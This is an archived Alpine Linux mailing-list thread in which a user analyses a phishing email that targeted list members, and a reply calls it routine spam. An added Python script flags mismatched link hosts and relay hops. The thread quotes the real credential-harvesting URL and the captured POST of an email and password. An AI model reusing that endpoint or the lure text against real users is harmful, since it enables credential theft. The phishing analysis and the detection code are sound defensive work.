Received: from out2.migadu.com (out2.migadu.com [188.165.223.204])
	by nld3-dev1.alpinelinux.org (Postfix) with ESMTPS id 80794780778
	for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 13:39:18 +0000 (UTC)
Mime-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ayaya.dev; s=key1;
	t=1665236356;
	h=from:from:reply-to:subject:subject:date:date:message-id:message-id:
	 to:to:cc:mime-version:mime-version:content-type:content-type:
	 content-transfer-encoding:content-transfer-encoding:
	 in-reply-to:in-reply-to:references:references;
	bh=UiC+d0rohcsYxF4bF5cr2i1gH/eujJEL6eL0DkJEReY=;
	b=QGadvYzEoJIqITbGQvVNV/oKhVwOIz77/+BuUmSBOpvV6qjf1ye/DKcEqlg1eBJfbd+F91
	 86caIOpNlp6CZ15oP9vCZ9sWhXVw5pl2tgXcsBRs7VnrKy0/bJZ5MKzOB7tGUYHM67gtid
	 CZg7YNDXL7Q5ah3CMKHsoxACOVuT9e0=
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=UTF-8
Date: Sat, 08 Oct 2022 15:39:15 +0200
Message-Id:
X-Report-Abuse: Please report any abuse attempt to abuse@migadu.com and include these headers.
From: "alice"
To: "Stefan Hartmann" , <~alpine/users@lists.alpinelinux.org>
Subject: Re: Your account associated with your alpine-user@lists.alpinelinux.org has been limited Reason ...
References: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de>
In-Reply-To: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de>
X-Migadu-Flow: FLOW_OUT

On Sat Oct 8, 2022 at 2:03 PM CEST, Stefan Hartmann wrote:
> Hello,
>
> yesterday I received a suspicious email from alpinelinux.org:
>
> "Notification
> Dear alpine-user,Your account associated with your alpine-user@lists.alpinelinux.org has been limitedReason: Messages - Delivery Process Failed .
> What happens when new messages are inaccessible?
> Once a new message is limited, it will be inaccessible—users will not be able to receive new messages.
> Want to keep the account and receive new messages?
> ..."
>
> There is a pushbutton which yields to https://siasky.net/EABzry9_94YhAghJPa5QmmPjGdw01d_BAgdPmQJCkk0vlA#alpine-user@lists.alpinelinux.org
>
> I analyzed this with burp:
> The pushbutton makes a post
>
> POST //img/Jesse.php HTTP/1.1
>
> Host: ommarts.com
>
> ...
> email=alpine-user%40lists.alpinelinux.org&password=spearphising%3F
>
> It returns a 200 OK.
>
> Does alpinelinux.org really use the PHP script http://ommarts.com//img/Jesse.php ???
>
> Suspicious!
>
> The message comes from
> ...
> Received: from nld3-dev1.alpinelinux.org (nld3-dev1.alpinelinux.org [147.75.101.119])
> by gw1.hafenthal.de (Postfix) with ESMTPS id 0D51BA80B87
> for ; Fri, 7 Oct 2022 20:24:23 +0000 (UTC)
> ...
> which seems OK.
> NB: received on an Alpinelinux mail relay!
>
> Was there a breach?

if you're referring to: https://lists.alpinelinux.org/~alpine/devel/%3C7e33418c8ccc805ee91c2176c2960a5a%4admin.reservasmi2u.mx%3E
then this is just random spam sent to the mailing list, without even a spoofed From:. though it does look quite believable :)
(i personally see these like ~12 times a week with all the mailing lists i'm subscribed to, so i didn't think anything of it)

>
> --
> Stefan Hartmann - ib.hafenthal.de
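The triage Stefan did by hand (read the Received chain, compare the claimed sender with where the button actually sends you) can be scripted for the next copy of this spam. The following is an added example written for this archive page, not code from either poster or from the Alpine project; the sample message and every host in it (lists.example.org, mail.sender-host.example, files.cdn-placeholder.example) are constructed placeholders, not the indicators from the thread.

```python
"""Triage a suspicious list message: who relayed it, who it claims to be
from, and where its links actually point.  Added example, not from the thread."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the report above; all hosts and ids are placeholders.
SAMPLE_EML = """\
Received: from relay.lists.example.org (relay.lists.example.org [192.0.2.10])
\tby mx.example.net (Postfix) with ESMTPS id PLACEHOLDER1
\tfor <member@example.net>; Fri, 7 Oct 2022 20:24:23 +0000 (UTC)
Received: from mail.sender-host.example (mail.sender-host.example [198.51.100.7])
\tby relay.lists.example.org (Postfix) with ESMTP id PLACEHOLDER2
\tfor <~users@lists.example.org>; Fri, 7 Oct 2022 20:24:20 +0000 (UTC)
From: "Notification" <noreply@lists.example.org>
To: <~users@lists.example.org>
Subject: Your account has been limited
Content-Type: text/plain; charset=UTF-8

Dear user, your account associated with ~users@lists.example.org has been limited.
Want to keep the account and receive new messages?
Click here: https://files.cdn-placeholder.example/abc123#~users@lists.example.org
"""

URL_RE = re.compile(r'https?://[^\s"<>)]+')
# The host named after "from" in a Received header is the hop that handed the message over.
RECEIVED_FROM_RE = re.compile(r'^\s*from\s+([A-Za-z0-9.-]+)', re.IGNORECASE)


def sender_domain(msg):
    """Domain part of the From: address (what the message *claims*)."""
    _, addr = parseaddr(msg.get('From', ''))
    return addr.rpartition('@')[2].lower()


def relay_hosts(msg):
    """Received headers, newest first: hosts[0] is the last hop, hosts[-1] the first."""
    hosts = []
    for hdr in msg.get_all('Received', []):
        m = RECEIVED_FROM_RE.match(hdr)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def in_domain(host, domain):
    """True if host is domain itself or a subdomain of it (not a lookalike suffix)."""
    return host == domain or host.endswith('.' + domain)


def body_text(msg):
    """Plain-text body, decoding the transfer encoding if there is one."""
    if msg.is_multipart():
        parts = [p.get_payload(decode=True).decode('utf-8', 'replace')
                 for p in msg.walk() if p.get_content_type() == 'text/plain']
        return '\n'.join(parts)
    return msg.get_payload(decode=True).decode('utf-8', 'replace')


def triage(raw):
    """Return what the message claims, how it travelled, and every mismatch found."""
    msg = message_from_string(raw)
    dom = sender_domain(msg)
    links = URL_RE.findall(body_text(msg))
    findings = []
    for link in links:
        u = urlparse(link)
        host = (u.hostname or '').lower()
        if not in_domain(host, dom):
            findings.append(f'link host {host} is outside sender domain {dom}')
        # An address smuggled in the fragment or query is how the landing page pre-fills its form.
        if '@' in u.fragment or '@' in u.query:
            findings.append(f'link carries an e-mail address: {link}')
    hops = relay_hosts(msg)
    if hops and not in_domain(hops[-1], dom):
        findings.append(f'originating hop {hops[-1]} is outside sender domain {dom}')
    return {'sender_domain': dom, 'relay_hosts': hops, 'links': links,
            'findings': findings, 'suspicious': bool(findings)}


if __name__ == '__main__':
    for line in triage(SAMPLE_EML)['findings']:
        print('-', line)
```

The last check illustrates alice's point rather than contradicting it: on a mailing list the final hop is always the list relay, so "received on an Alpinelinux mail relay" says nothing about who wrote the message, and the earliest hop of a legitimate contributor's post will trip this check too. The link-host and address-in-fragment findings are the ones that distinguish the credential-harvesting copy from ordinary list traffic.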